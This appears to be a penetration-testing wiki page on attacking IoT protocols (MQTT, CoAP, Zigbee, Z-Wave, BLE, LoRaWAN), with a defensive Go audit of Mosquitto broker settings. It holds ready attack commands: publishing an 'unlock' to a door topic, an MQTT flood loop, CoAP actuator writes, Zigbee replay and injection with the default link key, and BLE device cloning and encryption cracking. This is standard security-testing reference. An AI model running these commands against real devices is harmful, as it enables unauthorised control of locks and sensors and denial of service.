# IoT Protocols

Security testing for IoT communication protocols - MQTT, CoAP, Zigbee, Z-Wave, BLE, and LoRaWAN.

> **Skill Level**: Advanced\
> **Prerequisites**: Networking, RF basics, embedded systems

## MQTT (Message Queuing Telemetry Transport)

### Overview

```
- Port: 1883 (plain), 8883 (TLS)
- Publish/Subscribe model
- Used in: Smart home, ICS/SCADA, sensors
- Broker-based architecture
```

### Discovery

```bash
# Scan for MQTT brokers
nmap -p 1883,8883 --script mqtt-subscribe target.com

# Shodan
shodan search "port:1883 mqtt"

# Check for anonymous access
mosquitto_sub -h target.com -t '#' -v

# Expected output (if vulnerable):
# home/sensors/temperature 23.5
# home/door/status locked
# devices/camera/feed [binary data]
```

### Enumeration

```bash
# Subscribe to all topics (wildcard)
mosquitto_sub -h target.com -t '#' -v

# Subscribe to specific level
mosquitto_sub -h target.com -t '+/+/status' -v

# With credentials (if known)
mosquitto_sub -h target.com -u admin -P password -t '#' -v

# List topics via $SYS
mosquitto_sub -h target.com -t '$SYS/#' -v
```

### Attacks

```bash
# Publish malicious message
mosquitto_pub -h target.com -t 'home/door/command' -m 'unlock'

# Denial of Service (flood)
while true; do mosquitto_pub -h target.com -t 'test' -m 'flood'; done

# Intercept and modify (MITM)
# Use mitmproxy or custom broker
```
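The broker-side counterpart to the checks above, as an added example (not from the page or the Mosquitto project): a small Go audit of a `mosquitto.conf` that reports the settings behind an open broker (anonymous access to `#` and `$SYS/#`, no credentials, no ACL, plaintext 1883 listener), with a constructed weak configuration beside the constructed corrected one. The `/etc/mosquitto/...` paths are placeholders, and the hardened file still needs the referenced `password_file` (created with `mosquitto_passwd`) and `acl_file` to exist.

```go
package main

import "bufio"
import "strings"

// weakConf is a constructed mosquitto.conf that yields the open broker the checks above find.
const weakConf = `listener 1883
allow_anonymous true
`

// hardenedConf is the constructed corrected version: TLS-only listener, credentials and a topic ACL.
const hardenedConf = `listener 8883
cafile /etc/mosquitto/certs/ca.crt
certfile /etc/mosquitto/certs/broker.crt
keyfile /etc/mosquitto/certs/broker.key
allow_anonymous false
password_file /etc/mosquitto/passwd
acl_file /etc/mosquitto/acl
`

// AuditMosquittoConf parses a mosquitto.conf ("key value" lines, '#' comments) and reports the settings
// behind the findings above. certfile is treated as broker-wide; mixed TLS/plaintext listeners need per-listener tracking.
func AuditMosquittoConf(conf string) []string {
	opts, listeners := map[string]string{}, []string{}
	sc := bufio.NewScanner(strings.NewReader(conf))
	for sc.Scan() {
		f := strings.Fields(sc.Text())
		if len(f) < 2 || strings.HasPrefix(f[0], "#") {
			continue
		}
		opts[f[0]] = f[1]
		if f[0] == "listener" {
			listeners = append(listeners, f[1])
		}
	}
	var findings []string
	if len(listeners) > 0 && opts["certfile"] == "" {
		findings = append(findings, "listener "+strings.Join(listeners, ",")+" without certfile: plaintext MQTT, credentials and payloads are sniffable")
	}
	if opts["allow_anonymous"] == "true" {
		findings = append(findings, "allow_anonymous true: anyone can subscribe to '#' and '$SYS/#'")
	}
	if opts["password_file"] == "" {
		findings = append(findings, "no password_file: clients are not authenticated")
	}
	if opts["acl_file"] == "" {
		findings = append(findings, "no acl_file: any client can publish to any topic, e.g. door commands")
	}
	return findings
}
```

The referenced ACL file uses Mosquitto's own syntax, for instance `user sensor01` followed by `topic write home/sensors/#`, so each credential only reaches the topics it needs.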

### Tools

```bash
# MQTT Explorer (GUI)
https://mqtt-explorer.com/

# mqtt-pwn
https://github.com/akamai-threat-research/mqtt-pwn
python mqtt_pwn.py -b target.com -p 1883

# MQTT-CLI
mqtt sub -h target.com -t '#'
```

## CoAP (Constrained Application Protocol)

### Overview

```
- Port: 5683 (UDP), 5684 (DTLS)
- REST-like for constrained devices
- Used in: Sensors, smart meters, M2M
```

### Discovery

```bash
# Scan for CoAP
nmap -sU -p 5683,5684 target.com

# Shodan
shodan search "port:5683"
```

### Enumeration

```bash
# CoAP clients: coap-client is part of libcoap; aiocoap (pip install aiocoap) ships aiocoap-client instead
pip install aiocoap

# Discover resources
coap-client -m get coap://target.com/.well-known/core

# Expected output:
# </sensors>;rt="temperature",</actuators>;rt="switch"

# Get resource
coap-client -m get coap://target.com/sensors/temp
```

### Attacks

```bash
# Modify resource (if writable)
coap-client -m put coap://target.com/actuators/switch -e "on"

# Amplification attack (DDoS)
# CoAP can be used for amplification due to UDP
```

## Zigbee

### Overview

```
- Frequency: 2.4 GHz (worldwide), 868 MHz (EU), 915 MHz (US)
- Range: 10-100m
- Used in: Smart home, lighting, sensors
- Network types: Star, Tree, Mesh
```

### Hardware Requirements

```
- CC2531 USB dongle ($10-15)
- HackRF One
- YARD Stick One
- Ubertooth (can sniff 2.4 GHz)
```

### Sniffing

```bash
# With Wireshark + CC2531
# Flash CC2531 with sniffer firmware

# Using KillerBee (the tools are run directly, there is no "killerbee" wrapper command)
zbstumbler  # Find networks
zbdump -c 11 -w capture.pcap  # Capture channel 11

# Using Zigbee2MQTT (for analysis)
```

### Attacks

```bash
# KillerBee toolkit
# https://github.com/riverloopsec/killerbee

# Replay attack
zbdump -c 11 -w capture.pcap
zbreplay -c 11 -r capture.pcap

# Key extraction (if default key)
# Default Trust Center Link Key: 5A:69:67:42:65:65:41:6C:6C:69:61:6E:63:65:30:39

# Find key: search a dumped device memory image for the key that decrypts the capture
zbgoodfind -R capture.pcap -f memory.dump

# Inject packets
zbinject -c 11 -p [packet]  # Inject
```

### Security Issues

```
- Default/weak link keys
- No replay protection (some implementations)
- Insecure rejoin process
- OTA update vulnerabilities
```

## Z-Wave

### Overview

```
- Frequency: 908.42 MHz (US), 868.42 MHz (EU)
- Range: 30-100m
- Used in: Smart locks, thermostats, sensors
- Proprietary but reverse-engineered
```

### Hardware

```
- Z-Wave.Me UZB stick
- RTL-SDR (limited)
- HackRF One
```

### Attacks

```bash
# Z-Wave uses S0, S1, S2 security
# S0 has known vulnerabilities (key exchange flaw)

# EZ-Wave tool
# https://github.com/cureHsu/EZ-Wave
python ez-wave.py --interface /dev/ttyACM0

# Scapy-radio
# https://github.com/BastilleResearch/scapy-radio
```

### S0 Key Extraction

```
1. Force device into inclusion mode
2. Sniff inclusion process
3. S0 key is XORed with known constant
4. Derive network key
```

## BLE (Bluetooth Low Energy)

### Overview

```
- Frequency: 2.4 GHz
- Range: ~100m
- Used in: Fitness trackers, locks, beacons
```

### Scanning

```bash
# hcitool (deprecated but functional)
hcitool lescan

# Expected output:
# AA:BB:CC:DD:EE:FF Device Name
# 11:22:33:44:55:66 (unknown)

# bluetoothctl
bluetoothctl
[bluetooth]# scan on

# bettercap
bettercap -eval "ble.recon on"
```

### Enumeration

```bash
# Connect and enumerate services
gatttool -b AA:BB:CC:DD:EE:FF -I
[AA:BB:CC:DD:EE:FF][LE]> connect
[AA:BB:CC:DD:EE:FF][LE]> primary
# Lists services

[AA:BB:CC:DD:EE:FF][LE]> characteristics
# Lists characteristics

[AA:BB:CC:DD:EE:FF][LE]> char-read-hnd 0x0016
# Read characteristic value
```

### Attacks

```bash
# GATT attacks with gattacker
# https://github.com/securing/gattacker
node scan.js
node advertise.js -a config.json  # Clone device

# BLE spoofing with bettercap
bettercap
ble.recon on
ble.enum AA:BB:CC:DD:EE:FF
ble.write AA:BB:CC:DD:EE:FF 0x0016 01  # Write to characteristic

# Crackle - Crack BLE encryption
# https://github.com/mikeryan/crackle
crackle -i capture.pcap -o decrypted.pcap
```

### Common Vulnerabilities

```
- Static/weak pairing keys
- Lack of encryption
- MITM during pairing
- Replay attacks
- Unauthorized characteristic access
```

## LoRaWAN

### Overview

```
- Frequency: 868 MHz (EU), 915 MHz (US), 433 MHz (Asia)
- Range: 2-15 km
- Used in: Smart cities, agriculture, utilities
```

### Hardware

```
- RTL-SDR + LoRa receiver
- HackRF One
- Dedicated LoRa gateway
```

### Security Architecture

```
- AppKey: Application key (shared secret)
- NwkSKey: Network session key
- AppSKey: Application session key
- DevAddr: Device address

Encryption: AES-128
```

### Attacks

```bash
# LoRa traffic analysis
# https://github.com/rpp0/gr-lora

# Replay attacks (if no frame counter)
# ACK spoofing
# Bit-flipping attacks (if no integrity check)

# Join request replay
# If DevNonce not checked, can replay join requests
```

## General IoT Testing Tools

```bash
# Firmware analysis
binwalk -e firmware.bin
firmware-mod-kit

# Protocol analysis
Wireshark + dissectors
scapy (custom protocol parsing)

# Radio
GNU Radio
Universal Radio Hacker (URH)
SDR# / GQRX
```

## Related Topics

* [Wireless Testing](/others/wireless.md) - WiFi, general wireless
* [Hardware Hacking](/others/hardware.md) - Physical device testing
* [Network Scanning](/recon/network-scanning.md) - Network discovery

